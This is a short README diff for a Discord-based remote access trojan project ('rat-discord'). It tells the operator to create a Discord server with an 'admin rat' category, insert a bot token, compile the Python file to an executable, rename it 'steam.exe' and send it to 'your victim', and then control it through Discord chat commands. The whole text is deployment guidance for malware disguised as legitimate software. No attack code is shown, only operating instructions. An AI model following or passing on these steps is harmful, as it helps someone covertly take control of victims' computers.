Psada-DEV/rat-discord/readme.md

+- create a new disord serveur and create a categori named admin rat

--- to start the bot pute in logne 38 the token of your bot
+- to start the bot pute in logne 38 the token of your bot

--- withe the file 'ins.py' run it and tape 1 to converte tou .py file to a .exe
+- withe the file 'ins.py' run it and tape 1 to converte tou .py file to a .exe

+- send the file in the folder '' named steam.exe to your victim

+- to see all command you can say in a random chanel of your seveur !help